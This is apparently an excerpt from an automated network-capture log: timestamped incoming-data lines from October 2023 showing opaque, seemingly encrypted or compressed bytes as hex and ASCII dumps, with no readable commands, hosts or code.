2023-10-03 20:34:58 UTC	145	IN	Data Raw: 93 7a 78 5a 2e 0c 9c 01 1b 25 0f a5 77 67 00 bb 4f 21 1a 11 71 34 04 6d fc d8 04 dc 09 50 91 38 27 33 c2 07 da b4 6e 4e da 95 97 17 47 5e d2 b7 ba 8e 70 6b 59 85 50 ca 1c 18 49 d1 19 42 99 a9 6a 7d 23 1d 5e 5f de ab dc 28 af 44 8a 6a 56 7f 44 11 e8 f9 e5 5b 67 bb 60 52 4e 25 b8 3e 07 d1 f6 b1 dc 23 cb eb 49 d7 84 c9 46 68 01 fd 3f cf f6 c7 05 40 22 40 ed 68 ed f5 37 57 f9 d4 63 1e 3b 26 0c 08 f6 1c 0a 2d 3d 4d 48 9d 28 84 a8 90 65 eb 03 7e ab 14 ef 36 03 52 ab c2 2f 3e 58 5a ef ce 40 cd 4e 83 93 eb 36 31 56 d4 fd f7 e9 01 c7 34 c8 dc fb db da 39 0f 9d 4f 87 de d9 e5 37 ac 7b 55 6d 4d be 46 f7 20 df d1 7a 94 66 c0 b0 ca fa 55 7b 3e b6 e2 e9 39 ab 12 6b 60 26 ec 69 f5 63 25 d3 5d cb 05 21 70 16 dd ec 8e 60 39 75 b9 b1 6e a8 2f 0d 89 62 ca 24 a0 a3 7b 34 a9 Data Ascii: zxZ.%wgO!q4mP8'3nNG^pkYPIBj}#^_(DjVD[g`RN%>#IFh?@"@h7Wc;&-=MH(e~6R/>XZ@N61V49O7{UmMF zfU{>9k`&ic%]!p`9un/b${4
2023-10-03 20:34:58 UTC	161	IN	Data Raw: eb 23 37 bc e4 79 fb a3 71 41 60 1e 37 a5 2a d4 bf c0 b7 68 a9 a5 7b 83 d1 fe 0d 78 47 2e dd d7 93 e4 df 53 b3 d3 a5 ff 46 61 c1 21 14 18 17 b0 a1 a9 0a e1 46 fa 49 28 94 96 25 37 2f cf fb e1 79 32 83 68 1a 64 9c c1 14 53 c8 80 8b c2 cf 46 83 1f b6 73 75 fc a7 e9 0f 4e d9 17 97 57 ae 59 b0 f8 9a 8f 9f c0 77 48 bb 90 3b 6a db 54 5c 3f 25 84 87 f6 a7 8e 9b bb 6c 36 03 b3 fd bd a9 b6 83 42 bd 93 59 7f fb ac 25 bc c9 c2 06 4c d7 4d 82 a5 a2 09 29 8f 15 ab 5b 4d cd 24 5e f2 6f bd d9 ec 5d f8 f7 3f b1 53 fa 37 85 ba 26 cd 28 69 58 0f c7 0a 00 4a 9f 4d d3 58 6b 62 35 ab 4b c6 4a 26 93 d7 ca d9 26 d9 35 a5 4c 45 99 4d 01 35 d8 65 7f 1b fc 83 a6 6c 81 26 1f a9 b6 9e eb f4 0e 29 2e a5 0e 96 bf 24 79 81 05 4e 06 9b 6d 4d c1 ff b0 b5 05 fd 3a 75 3e bf 98 24 b3 2c dd Data Ascii: #7yqA`7*h{xG.SFa!FI(%7/y2hdSFsuNWYwH;jT\?%l6BY%LM)[M$^o]?S7&(iXJMXkb5KJ&&5LEM5el&).$yNmM:u>$,
2023-10-03 20:34:58 UTC	177	IN	Data Raw: 81 d7 62 38 44 d3 43 ca 4b ca 40 8b 62 d4 9a 36 17 ec 30 73 7f a6 40 ec df 0f fc 6f 8f 5f 5a 8f 6a 0c ae 42 47 7a 70 f8 73 81 10 cc b1 bd 3d df 00 59 a0 59 69 3d 36 2c 70 97 32 6e 37 af 37 a3 09 87 3f 28 ac 89 09 41 80 c4 db ef fd 04 6b ae 80 9e fb 69 86 d0 7c 17 7e 66 dd 8b 49 3f a9 86 37 9c 87 63 b0 75 67 fc a8 1a 19 60 6b 59 2b dd 46 bc 5f 90 c2 68 7c 4c 6f 60 a0 e0 f5 e8 b6 87 f7 df ca cb a6 8d f4 2b db 93 ed ff 45 35 a9 91 5b ed e3 88 6b 26 5f 5c f8 e9 33 1e 3a ca 35 03 03 76 b1 a4 e2 51 c4 4b 4b 46 33 73 96 28 43 f3 96 c1 fb 08 58 8d fb 85 4c 1d 8a 81 04 29 c0 1b 5e 80 fe 9e ed 06 cc fe 13 c6 e9 bb 7f f5 21 37 f3 8d ce 3a 33 23 b8 ea d1 96 f1 85 37 c4 32 a3 eb ff ac 03 93 1a 45 8e 61 1c 23 4a a5 4c d6 dd 80 d9 3f 2d 8d 6f 88 5f 52 05 3e 68 37 17 0a Data Ascii: b8DCK@b60s@o_ZjBGzps=YYi=6,p2n77?(Aki\|~fI?7cug`kY+F_h\|Lo`+E5[k&_\3:5vQKKF3s(CXL)^!7:3#72Ea#JL?-o_R>h7
2023-10-03 20:34:59 UTC	193	IN	Data Raw: 1f 3c e8 e0 cb 20 d6 61 50 7d a2 94 d3 38 e5 c0 03 cc 21 e0 91 85 60 a4 8c 20 ab 25 25 51 08 9b 83 af 55 3c 9f 8c d4 5a 93 67 e3 34 1e 0b 21 7f 25 29 19 d3 ca cc ff df 99 d0 62 52 b1 98 e0 46 eb ce 1e f1 63 98 ae cb 3b 59 c7 fd 79 75 f0 cc e8 3d ca 71 47 ab 17 10 27 6a 12 0f 06 d4 2e 36 2f 2c f9 d6 91 5b 90 68 ba 9a 02 92 a4 d1 52 19 81 d6 ed 51 f8 8b f7 80 c9 dd 22 41 cd e2 bb df c6 fa 64 3e f2 5c 61 fa 21 74 1c 22 d3 1f 29 5c bf 7e 7a 8d 39 4c cb bc 5b 61 30 12 ef 09 2c 5d 48 22 6d c2 bd f1 b6 86 f6 d9 d6 2e 2c e5 e2 d5 b6 9e 9f 1b 59 01 d2 73 d5 e2 e5 e9 59 e9 3f 20 f6 b5 95 66 b6 04 75 6e 80 9e 26 b2 c4 26 6f d4 43 08 61 ab 01 8f 10 31 bf 8a 24 c4 4f 6c 89 60 0b 11 15 d7 ed 3b e3 56 5f bf 9b cf ef 0c f4 54 b6 5d 73 6d 6b 99 76 0f 64 93 97 0c 53 c7 46 Data Ascii: < aP}8!` %%QU<Zg4!%)bRFc;Yyu=qG'j.6/,[hRQ"Ad>\a!t")\~z9L[a0,]H"m.,YsY? fun&&oCa1$Ol`;V_T]smkvdSF
2023-10-03 20:34:59 UTC	209	IN	Data Raw: e2 33 0e 06 f2 66 59 d6 00 40 6f 7a 62 d5 f0 76 bc 51 50 72 1a 90 f5 79 34 cf 17 ef 30 2e 4a 43 09 5a 14 79 7f 39 22 a4 02 45 aa 35 f5 38 de 8f ab 25 5a 49 15 98 33 1e 1f f3 ba 2f ad 12 00 ac 8f 58 83 ce 01 bb 4b f6 d5 80 9e 71 06 c5 c2 5b 33 d3 2d 80 5c 5f a8 7f d8 ef 72 2c 8a 00 fb 4e de b4 97 b6 c2 4d 85 60 e7 0d 01 b1 50 3a 1c 1b cc a2 8e 6e 90 3e 4b 24 37 f6 f3 fa 28 49 42 ac 89 e4 1e 9f 24 b0 2e a2 27 64 da 8f 1b 49 41 d2 2e 43 d9 b7 5a f5 40 09 fa ef 58 5e 7c 56 36 52 3e 42 39 27 2b c2 df ed 4e d5 8e 2d 0a d4 4b 53 32 e4 54 64 7e 1c 26 fa 07 7f 19 1e 9b 6a f7 6f 55 9d fe 58 a9 fb c5 a7 e7 6f fc f3 58 9f d1 d0 c4 93 d0 57 e2 c8 ac 16 59 26 81 c0 a5 b2 39 b5 c1 b9 34 26 3e 14 d8 cd 4b b6 e6 8a 96 8f 1c 18 cf 8e 4a 13 62 31 7d 0b e9 88 38 cc d2 17 e1 Data Ascii: 3fY@ozbvQPry40.JCZy9"E58%ZI3/XKq[3-\_r,NM`P:n>K$7(IB$.'dIA.CZ@X^\|V6R>B9'+N-KS2Td~&joUXoXWY&94&>KJb1}8
2023-10-03 20:34:59 UTC	225	IN	Data Raw: ab 0d ad ca 94 ad d9 b8 bc d2 ba 37 e9 8c 97 b1 fc c5 b2 36 73 7f 33 b3 95 ad 3d ea 95 c3 d2 3c fc a5 47 5a 90 8d f6 83 f0 95 c5 0d e9 09 c6 fc 1d 84 1f 0e 2c a1 e2 4d 25 4a 2e 86 8c b6 3a c1 9a 5a f7 c9 d5 ef 2f 0c 1d ac e5 9a 4b ff 50 14 43 ca 6f 87 2c f6 70 7f 52 a5 62 88 f7 e0 90 b1 56 1e 28 28 db f6 09 c9 42 f1 0f af 7e 69 0e ef b0 fc 07 d4 f7 4b b3 9c 35 05 be f2 bb 41 7e 4d a5 8e e8 85 c2 98 ae 12 fc 9e 77 b7 8b ba 4c 83 5c 1b 80 ca 9c c3 54 12 07 22 e6 2b 25 1c 02 74 07 62 30 e1 dd 4b 19 da 4c c6 4c 84 9c 70 1c 75 10 7f da fa 56 08 c5 68 31 10 ff 01 d9 78 54 7c 3a 8c f7 22 01 59 67 2b f4 21 01 16 a2 6f bb f9 0f c5 1c 7e 75 d7 64 5c 68 d7 24 2d fb bd f0 fd a0 cc f8 95 a6 a1 bd 68 44 3b c0 c2 85 4a 76 a7 56 10 03 db 24 bf 42 8e 2f 4e 85 b7 b7 4f 4e Data Ascii: 76s3=<GZ,M%J.:Z/KPCo,pRbV((B~iK5A~MwL\T"+%tb0KLLpuVh1xT\|:"Yg+!o~ud\h$-hD;JvV$B/NON
2023-10-03 20:34:59 UTC	241	IN	Data Raw: 20 33 78 cf 59 18 a5 96 47 27 f5 de 11 00 21 d3 3f 00 37 96 a3 df c8 3b 9f 4c 16 10 0a 5e a9 b3 54 b6 35 d4 af af 13 40 f7 5b 09 a9 f0 e8 f3 5a 90 2d b0 a9 bd 2e df 2e 02 b7 88 db 6a e2 b6 6d 2d 61 aa 00 17 d1 a9 9e 3b 51 f8 b8 07 60 67 44 43 29 d0 97 19 b3 ef 35 11 34 50 9b 27 39 2d 24 c5 6b e9 50 3c 5c 3b 08 be 76 0e cb 8f 7c 46 8a 9b 35 65 92 40 a8 f1 1a c1 d4 08 7b 9e 7d b7 0a 48 08 1a 39 ce c1 cc e5 03 3f 89 99 bf fe 94 d4 6f ea 95 f5 0c a8 c4 fe 79 0c 6d 6c 66 a3 f7 7b 4e 33 84 6a b2 c9 87 14 14 67 7e 70 07 20 74 c3 39 ee 13 56 7e 90 33 62 16 8d 2f 7b ba 2a 77 0b 64 91 37 40 97 46 98 99 5e 5e 61 4e a5 e1 75 0c 96 64 82 3e 9b 25 c9 b2 08 b9 d5 5d ff 5d 6b 17 14 73 0b e1 57 c1 51 15 c2 85 5f d1 0c 26 f1 57 1e cf 7b 3b 02 81 90 bd d0 e6 88 01 0c 4e 54 Data Ascii: 3xYG'!?7;L^T5@[Z-..jm-a;Q`gDC)54P'9-$kP<\;v\|F5e@{}H9?oymlf{N3jg~p t9V~3b/{*wd7@F^^aNud>%]]ksWQ_&W{;NT
2023-10-03 20:34:59 UTC	257	IN	Data Raw: ce 4e bf 0b ff 8e eb 51 7b 21 ad bf 61 9d a3 ff 6e cb 88 7e e1 a4 41 f7 39 30 b8 09 3a 1d c9 65 48 b3 74 bf 53 4e 56 2e 81 64 c8 ec 94 0a 22 2c 49 c3 e3 f5 64 e8 d4 43 76 fa ff 9a 57 9a 73 a1 e7 7f 1c 52 98 64 ec 8d e4 42 1d af 8b e8 a1 df dc 82 d3 ed 80 62 7f cc 4b 0c 18 32 60 31 f9 a6 be eb 05 98 f9 94 a8 ca 4f f4 38 82 cf 1f 94 f0 b4 97 71 80 5b 84 60 44 0a c7 23 f6 2e ca ab 38 4d 68 7c 36 03 06 b8 b2 cf e9 ac fb 6d d2 4f 5b 58 a4 09 16 03 ad 9e 14 ae 4a 8e df 50 fe 04 79 8f 4a dc d3 65 6d e2 1f 79 a2 97 ed 8d d9 60 52 a0 f7 70 c6 92 25 cc 34 02 d3 c9 f4 30 8a db 98 28 64 ab cd 83 d6 be ef e7 77 68 ce f9 ce 76 0d 1e d1 5a 50 e2 35 3c ab dd 5c d4 bb 40 b6 6c f7 1d 85 3e 6d c2 d2 5a 60 e0 fb 2f b4 82 9a 67 13 99 52 76 8c 6e 3a 73 fc 2a 21 3d 45 c9 27 02 Data Ascii: NQ{!an~A90:eHtSNV.d",IdCvWsRdBbK2`1O8q[`D#.8Mh\|6mO[XJPyJemy`Rp%40(dwhvZP5<\@l>mZ`/gRvn:s*!=E'
2023-10-03 20:34:59 UTC	273	IN	Data Raw: 4c f9 5d fe 2e d8 86 54 d0 3e 53 2e 37 fb 0a 1c a3 97 b2 1e e2 7c d8 c7 22 11 90 0c 1a 2e b3 c7 2b 29 4b 77 16 2f 4b 0a c0 95 7d 5c 34 97 d4 22 21 28 76 a4 71 5f 4e 8e 0b f7 71 d9 87 2c e4 70 d2 c5 77 89 47 72 da 8b ac 38 34 96 d4 a0 16 2f 5a c6 81 85 6c be 60 6a b0 7b 5c 6e be eb 40 99 21 87 c2 71 fc 82 89 b7 ff 89 8f 05 c4 00 0b c5 27 0d 67 4a 0b 65 11 be f2 fa 3b 6d 31 59 8e 71 af 2f 67 21 ae 8b aa 84 af e9 59 58 39 3f f7 bf ed f6 fe 28 7f 95 90 62 d7 af d7 03 aa 36 5b c9 9a 15 bf ad 76 7f da 01 66 56 77 4a 94 9b ed 34 ea b8 13 3f 90 d0 33 06 1a 10 1d 48 12 a6 7c ae 3b 84 77 f1 70 7b fa 06 8e 76 f3 ac e9 b4 9f c9 1f 84 fc c8 4c e1 13 ca 29 c9 0f 21 77 fc 2c 3a c4 92 8a fd a8 44 42 55 fc cd be 3f 01 97 61 f5 0c 6a 63 e4 c2 3d c5 b0 2b 90 5c 7e 18 e0 ec Data Ascii: L].T>S.7\|".+)Kw/K}\4"!(vq_Nq,pwGr84/Zl`j{\n@!q'gJe;m1Yq/g!YX9?(b6[vfVwJ4?3H\|;wp{vL)!w,:DBU?ajc=+\~
2023-10-03 20:34:59 UTC	289	IN	Data Raw: 74 be e2 d1 0d a5 d3 9a e6 0f 98 45 54 40 94 82 bf 22 88 9c c7 2d 1a fa 8a 4f 04 fe 27 a7 87 65 da 2d a3 a8 04 1d 84 e5 b0 b9 bc 75 4f 1e 27 e0 86 87 22 34 c0 e5 61 f4 a7 19 d7 0c a2 29 1f ca 39 30 b8 75 6f 75 04 b6 82 65 40 12 37 d3 f3 2c 45 75 e4 18 86 6e d5 84 18 1b d6 3a 4e 3c fe 5c 61 da c2 09 27 7d dd 43 4a b9 d3 4f e6 78 c4 2e a8 e3 31 22 e1 7e d5 61 8f 7d 38 17 5a 99 52 f2 44 82 e9 98 30 8d 6c c1 e4 60 8b 70 96 b0 5e 42 6a 7f ed 9e f7 bf 53 77 00 ee 4e 68 62 f1 20 c0 f4 90 47 5f 36 03 ec 51 b0 c3 a8 22 70 c2 89 04 cd fc 38 47 66 64 45 80 48 aa 7b 73 4c 3e d9 c1 ae f5 c5 5f 56 7a 12 bd f3 33 9a 1d 6a 5c 7f 6c af f3 01 03 a5 50 31 91 5e 83 b9 61 cc 19 57 ba 00 03 ec 10 fe d6 cf 8d 00 c7 d2 8a c9 97 46 06 93 4c 52 4b 19 6d 00 9c b3 26 30 c4 0c 1c 98 Data Ascii: tET@"-O'e-uO'"4a)90uoue@7,Eun:N<\a'}CJOx.1"~a}8ZRD0l`p^BjSwNhb G_6Q"p8GfdEH{sL>_Vz3j\lP1^aWFLRKm&0
2023-10-03 20:34:59 UTC	305	IN	Data Raw: 0d c1 41 c8 1a 5b 7f 77 78 70 20 5d c8 a9 98 af 61 aa 25 68 0b 93 b0 eb 2c 79 65 90 86 41 c7 9c 80 cb e1 40 63 b8 be a1 3e 23 13 32 7a 5c ad 8f 80 fa 45 fe db 06 26 18 9b a7 62 93 3d a7 f8 7f 5b 45 3b 7e ad bd 15 0d fc 22 14 34 37 8a 21 b6 e5 8c 0d 61 68 ac 38 df 36 47 74 6a d9 b9 c4 3a 2f 47 c9 68 9f c0 82 37 58 0e af 4c 25 21 76 04 84 2b c8 9f 74 84 b3 ec ae e6 d5 58 cc 75 a7 37 d6 2d da 2c 6c cc c0 c4 0b 83 08 23 d9 e0 b4 22 fa 20 15 f9 5b a6 10 97 3a 88 b4 0c cc ac d0 0c b9 cf 42 bc 46 1a 91 84 0f 59 1a c3 0c 0c 9d bc ac 71 c7 84 ba ea 78 22 ff f2 b6 17 df 5e 78 9c 8e 26 97 80 ba e2 3d 0a c4 33 fa 5a 81 7c 2d 03 86 47 4b 55 37 57 90 9e 8f 92 41 16 f8 1b d9 5a cb fd 5d d0 25 9e 46 47 94 7c 52 e0 d3 9c f1 41 56 c9 a9 63 6c 16 aa ea 92 c8 5a 05 62 6d 1d Data Ascii: A[wxp ]a%h,yeA@c>#2z\E&b=[E;~"47!ah86Gtj:/Gh7XL%!v+tXu7-,l#" [:BFYqx"^x&=3Z\|-GKU7WAZ]%FG\|RAVclZbm
2023-10-03 20:34:59 UTC	321	IN	Data Raw: 05 69 bd c8 84 17 e1 13 74 ae 19 71 90 3d 6f 85 aa 7b ed 10 07 0e 5c 46 1c 36 73 ae 56 76 af 1d f6 56 b7 a9 25 a2 03 ab ed 64 43 c7 b2 35 13 de 7b bf 1e 96 e2 92 56 ad 14 dd d7 83 fb 52 f2 d0 3c f7 0e 5d 97 70 21 2f 01 79 7a ff ee 1b c4 fb c5 df 72 1b ee 7d 32 57 fa a7 ff 25 f0 4e 9b 0f 86 c3 d9 10 f2 b3 d1 35 b5 9c 4a dc 0f 80 73 ac d4 ff 86 f7 07 35 83 7b d8 35 07 ab b9 99 d5 41 4d 21 e2 f2 b6 3e 86 9b 57 23 67 36 4e 0c fd b8 3d 81 e0 a0 82 9f a2 74 f1 f9 31 31 38 a2 4d 8d f5 27 1f 41 8c b2 1b 03 41 0c 39 ed 5d 4f 63 9c 73 af bd b0 73 49 72 08 c1 10 8c db 00 02 68 41 85 67 00 38 fb ef 0b 8c b0 4d fc 0a 66 93 22 2c 82 25 4a 9e 7b e1 90 c7 4d 68 9d 51 50 c3 a8 70 b6 ac 13 0a f6 a4 1e a4 3e 75 66 a4 16 48 de f7 12 00 b2 11 09 2a b8 00 ee 53 b7 3c 30 4d 12 Data Ascii: itq=o{\F6sVvV%dC5{VR<]p!/yzr}2W%N5Js5{5AM!>W#g6N=t118M'AA9]OcssIrhAg8Mf",%J{MhQPp>ufH*S<0M
2023-10-03 20:34:59 UTC	337	IN	Data Raw: 5f 50 9d 01 0d e5 33 8e 5d 1e bd 95 1e 75 15 13 73 69 bc 26 3d fa 0a a8 34 5c 3e b7 4b ca 93 9e b8 26 07 6d 9e 2f d9 c4 bb 41 2d b2 38 42 de 48 da d0 8d 2e 74 36 f6 84 6e 1e 99 35 98 3e f2 9b 5b 9a 37 7c b2 ba 0d be d6 00 82 c6 82 39 73 bf 6c 4d 45 f0 84 fa 3d 96 07 f3 ea ad 5b 61 a6 29 57 6b fc 4d b5 16 3c a9 b5 9a 77 c3 6d 6c 05 41 b8 ba 45 cd a7 74 e8 87 fd 4b df d4 1b 8b 50 74 69 c9 60 f7 cc 49 08 26 93 60 92 d5 ed 66 d1 96 e2 00 88 1e c7 7d f6 f8 18 f4 bc 7f 7e d5 77 94 7a 8c b1 7e b3 7c 3b e0 25 8f d4 93 4b 9d ea 29 93 c9 cd e9 97 b1 0e b7 ae cb 1a 19 54 59 2d f6 9f f6 8f 32 5f 35 5a d5 f4 39 c3 dd 64 ac a1 6b 72 42 71 7e fd 34 34 f0 2c fd 6f a6 d5 ad dc 72 7e c8 a4 8f a6 70 50 4b e0 6d a0 03 ae 38 98 f0 f1 dd 64 68 1a 0c e6 8c b5 2f 3e c8 a7 71 93 Data Ascii: _P3]usi&=4\>K&m/A-8BH.t6n5>[7\|9slME=[a)WkM<wmlAEtKPti`I&`f}~wz~\|;%K)TY-2_5Z9dkrBq~44,or~pPKm8dh/>q
2023-10-03 20:34:59 UTC	353	IN	Data Raw: d5 13 97 73 74 a0 21 ce f6 62 c0 9d d3 4e 74 f0 7a bd f5 f6 82 86 34 50 96 4f 22 21 e4 5c 75 38 2f e7 a3 d2 72 02 cc 09 7a ed 90 ce 8c b8 bf 47 43 8e ae 99 03 3a 1c 0f 1c fc 75 18 3a 86 46 2a 60 13 1c 04 9d 14 22 24 39 03 d6 73 ee ba b0 8a aa 32 eb ae f9 45 01 1e 3b 48 4d cc e0 27 a0 56 3e db 8f f4 ce 5b 4e 58 15 ee 08 a9 51 a0 3e ae e3 00 8d fa c7 14 88 ce 54 a4 c6 66 a3 f3 f0 11 0c 1a a8 83 c1 02 21 5f 0c 58 79 21 24 54 b9 f5 3f 95 3c 2f bf 45 f6 47 d9 20 3a 98 12 92 9c ea e0 ca c9 1d 39 eb df e4 d7 f7 93 72 95 34 fb 31 f4 85 41 68 fa 7e 8d 59 eb 09 b0 12 dc fe 55 0e 06 d8 58 64 e0 64 3e d7 3b 53 02 03 2c 04 0d 6a 70 fd 38 d5 90 41 0e 6c c8 72 79 48 20 2b af ff 74 e6 a3 19 b0 5e e4 a8 d9 3f 91 4f 01 de 5e a2 ff 6c 03 04 00 b4 2d 5e 56 0e 7d 45 72 ca de Data Ascii: st!bNtz4PO"!\u8/rzGC:u:F*`"$9s2E;HM'V>[NXQ>Tf!_Xy!$T?</EG :9r41Ah~YUXdd>;S,jp8AlryH +t^?O^l-^V}Er
2023-10-03 20:34:59 UTC	369	IN	Data Raw: 56 68 dd b0 b2 8f b5 b1 85 f2 76 98 24 2d 16 75 63 5e ba 7c 33 87 49 d0 54 c4 8c 03 1e 0a 75 2b ff 07 78 2c c7 9d 0a c9 25 cc 1a 15 d4 f6 6d a7 72 e7 ac 98 b6 8f 0b 76 2b 47 58 7e 82 1c c5 5c 78 f6 60 5b a8 06 47 02 a4 e6 b6 6d 2e f7 f4 9e 44 af 8d ac e7 db 67 ca a3 63 d7 8d ee 0e 26 c7 ab 25 fa 05 ba e7 7c 85 e7 a0 d9 65 a2 40 33 e3 58 9e 0f 23 10 e7 7e 75 61 fa ab e9 f9 5a c5 c9 7f 5e fd fc e5 fa a8 b1 bf c8 a7 08 34 5a e6 ed 73 67 7e 93 96 91 c1 c1 a6 10 b6 f0 e7 d7 90 7a b9 c5 98 1a c6 e5 e8 4e f3 80 55 01 d7 17 d4 07 a4 20 69 34 a7 20 2b 96 c3 19 76 1d 0d e6 57 90 0e f0 b0 30 28 8b c5 e9 47 03 2d f9 2d db 4e 6f a4 e5 70 f4 9b 53 2e c1 d0 83 a5 a8 92 4b 73 48 f8 30 2d ae 29 5d de 83 1a ce 74 e4 76 7b d3 79 9b 07 6c f5 1e b1 60 b1 d6 0b 08 76 00 7b d4 Data Ascii: Vhv$-uc^\|3ITu+x,%mrv+GX~\x`[Gm.Dgc&%\|e@3X#~uaZ^4Zsg~zNU i4 +vW0(G--NopS.KsH0-)]tv{yl`v{
2023-10-03 20:34:59 UTC	385	IN	Data Raw: 47 02 08 fa c3 90 6e a0 fd 40 27 0c d7 33 fc a1 82 8f 3b 32 ff 18 ba b9 2f 97 ee f3 c4 6a 2a 02 3d 35 31 22 46 dd 31 1f 25 80 0f 7a 77 72 4c 0d d1 6e 71 06 53 b1 c9 90 f8 76 b6 75 35 3c b2 5c de 66 09 ba 8d 78 ee c2 7a 97 03 0a 21 2a 77 fc a6 87 a4 dc 0b 8f 05 01 25 26 b5 e4 f6 bb 93 5c 98 b9 61 7e 1f 4f 59 cf f0 dd be fc 55 a7 fc 51 bd dd f3 95 27 59 f3 0c 5c 0d 61 e9 26 41 52 aa 62 7b 0b d2 6b 4f 13 48 5f 8f f4 1b 9f f7 20 fe 1d f5 46 1f 52 8b ca 45 1f f3 01 2f e8 3e bd 3b 69 fd e1 1c 9c 3a ef 2e 76 e1 9f a0 7c aa 7e 21 5d 49 d4 f0 21 ed 98 02 50 01 a0 16 0c cc 4a b4 b3 b6 cb c9 b7 df 3c ad be 01 49 12 91 2d fa f7 6f 58 51 bd dc 6d d9 3a fe 85 ad 8d 16 3f ac 42 71 71 5e d0 79 f7 19 90 39 0c 76 5e dc 6a 02 71 0e 9a bb e6 58 eb 70 2a 1d 19 12 1a 5e ea 77 Data Ascii: Gn@'3;2/j=51"F1%zwrLnqSvu5<\fxz!w%&\a~OYUQ'Y\a&ARb{kOH_ FRE/>;i:.v\|~!]I!PJ<I-oXQm:?Bqq^y9v^jqXp*^w
2023-10-03 20:34:59 UTC	401	IN	Data Raw: 5f d8 3c 42 50 8b d4 ec d1 8f 7f f1 87 96 7f c0 f6 a6 d6 02 34 cf 7a 23 d5 da 75 7d 51 60 4d 45 7d 51 f6 0d 72 c3 de cb ed 16 60 f2 3f 04 d5 16 c3 e6 a4 df 19 96 cd 56 c4 85 f2 b3 34 ee 47 83 21 60 ea 49 b6 80 c1 05 46 f1 69 87 0e 80 4d f0 6e 3f 91 b3 17 5d 5f a3 04 9f 2f fc 0a 11 5a 2e cf 52 58 6b a2 b7 bc c4 ff 96 4f ac 64 67 88 eb 36 c1 cc ae 02 2c bc d6 81 95 05 09 b1 54 6f e8 61 6b b4 0b 66 5c 2e 36 2e fa 06 e8 6c 57 65 c3 6c f8 11 60 77 63 20 11 c1 84 47 22 f9 7a db 19 dc 59 15 83 eb ab 9e df dd a0 94 43 b1 21 9f d3 52 e9 20 c5 06 38 c9 bd e7 61 d5 1d f9 bb 50 50 50 6f 1e 3b e4 9f 06 45 6d 50 f0 e6 42 9c 87 28 1d f9 9f 1e bd 0a 00 9b e5 50 b7 0b 50 c1 2d 9c d5 3e ab 11 19 f5 26 e0 4a cc 29 e5 ce e2 bd 66 1e 33 56 f9 2a 4c 75 03 19 5f 84 e1 20 62 34 Data Ascii: _<BP4z#u}Q`ME}Qr`?V4G!`IFiMn?]_/Z.RXkOdg6,Toakf\.6.lWel`wc G"zYC!R 8aPPPo;EmPB(PP->&J)f3V*Lu_ b4
2023-10-03 20:34:59 UTC	417	IN	Data Raw: 0c 80 10 55 bc c5 81 13 8b 89 52 7f 48 8e 16 25 18 50 d4 f2 f9 39 88 a6 8c 14 0e c1 a6 63 21 51 13 0c 8d 39 3f 91 5d 1a 6a d2 f2 0c 91 e4 c3 67 fe 85 fa aa 8c bc 00 e4 ae c0 96 92 f1 d4 c4 d2 37 07 25 a2 e8 f3 38 40 8b 20 77 7e 49 19 b7 aa 5a b0 0f ea ce b6 3d e7 2b 0d f3 4a cd 74 dd c9 ef fc 6c 97 be 2d 10 8e 3b da 69 e5 11 1f a2 5a b7 8e 79 d2 32 cc 65 ee c1 89 71 e6 87 6e 85 df ed 4e eb 14 04 68 5a 43 6d b9 3b 12 e7 85 0e eb 06 9f 58 a2 32 05 29 10 58 b1 26 af 08 63 2d f2 7f ec 81 0d f5 25 60 dd 4e 8a b1 db 2c a0 2a c1 9f 50 8c c3 20 42 40 4c 27 76 0e ee 5d 5b 4e 83 ce c3 6e ae 10 ad 92 4f de cc 47 42 5b 05 d5 46 5c 64 3d 38 12 6a 9e c6 ad 0a fe 81 6d 0d 7c 2b b1 22 82 2d e9 4a ed e9 e1 4b af 09 e2 bb f5 a3 ee c6 09 a4 e4 42 1f 14 2c a6 c3 12 0a c1 80 Data Ascii: URH%P9c!Q9?]jg7%8@ w~IZ=+Jtl-;iZy2eqnNhZCm;X2)X&c-%`N,*P B@L'v][NnOGB[F\d=8jm\|+"-JKB,
2023-10-03 20:34:59 UTC	433	IN	Data Raw: 2e 2c c6 80 73 42 ad cf c3 88 3a 91 59 8c be b7 93 a2 6f 6e 4f 96 32 6d f3 bf f7 ff ad 28 83 3d 07 4b d9 f3 0f 43 10 69 28 18 38 08 83 de 60 b6 72 9e d7 9a 70 5c 22 7c 73 6d 7b 12 de 3f 21 58 4e 38 75 9a 0b 74 b2 15 5c 2b 72 7f 77 72 fc 7b 17 a6 cc 9e 9a 0d 5e 54 00 e3 ef 8f a0 d3 55 45 14 2f 99 bf 66 d1 76 0c ed 9c 92 76 15 d8 a0 e0 0d 02 50 07 6e 02 22 cd ee bc 8e e0 cb 68 fb d7 1c 2c 92 50 06 a8 d5 4b 3e 34 d5 45 e4 f0 ef ba 1f f7 a9 d5 9c 81 34 66 0d 38 7e b3 86 36 b2 9a b2 fa 70 57 89 c5 fb c3 bf 03 af a8 56 b4 29 0b ef cc e8 6d ec 9f db db b8 c8 a2 8e 2e d5 02 a9 e1 b7 77 2f bd 03 27 76 c3 18 2a e8 11 32 3e 2f f1 c8 3d 67 31 05 16 fd e0 5a 60 62 81 57 b5 e8 7f d2 94 70 c5 10 84 c0 55 d4 b8 e2 2a 1e 72 87 ea a2 42 53 51 29 01 4e 47 de f7 77 ff e3 97 Data Ascii: .,sB:YonO2m(=KCi(8`rp\"\|sm{?!XN8ut\+rwr{^TUE/fvvPn"h,PK>4E4f8~6pWV)m.w/'v2>/=g1Z`bWpUrBSQ)NGw
2023-10-03 20:34:59 UTC	449	IN	Data Raw: f5 d7 d9 f1 ae 72 c5 27 e6 f8 5f ef 6c 7a 7d 93 c9 28 59 eb 99 f8 53 66 a6 d5 54 fb 0f 3f c6 17 76 0b 0f 6d 3f 23 fa 0f 02 1b 41 0e 49 6e 86 4f 6d b3 d8 c9 ff bb 06 81 76 62 2f a8 18 a3 11 fd 7b b8 a3 b1 fe 62 ba 60 e7 03 13 a0 7a ee 3a 32 2f e3 0e 41 e4 ee bc fe 3e b7 c5 dd 26 4b 1d cb bd 49 83 64 73 ae 1f 37 b4 1b df d7 2d 9e 84 dd 8f d6 ac f8 b6 c6 2a fb 61 ad 50 55 27 9e 22 10 af 12 e1 ab d7 bf 66 1b 58 a5 ab 7f 25 b5 e1 f1 ba 10 7f a2 b7 d4 21 c0 ee 79 74 59 f1 81 0b 91 d2 3e 5f 26 17 80 fd a0 a6 e9 35 33 6c 99 a0 41 f2 c3 e4 0c ac 0b e3 56 a8 db 3b dc 23 fc a8 e3 75 81 75 db dd be b3 53 71 0d c8 33 b3 c1 ad 09 c6 df 77 7b 17 df 42 69 43 97 cb 6a b8 cc c1 8a 72 22 7d dc 3d 3b 09 b3 16 03 b4 b9 bf c9 18 9e 47 f9 a0 76 a1 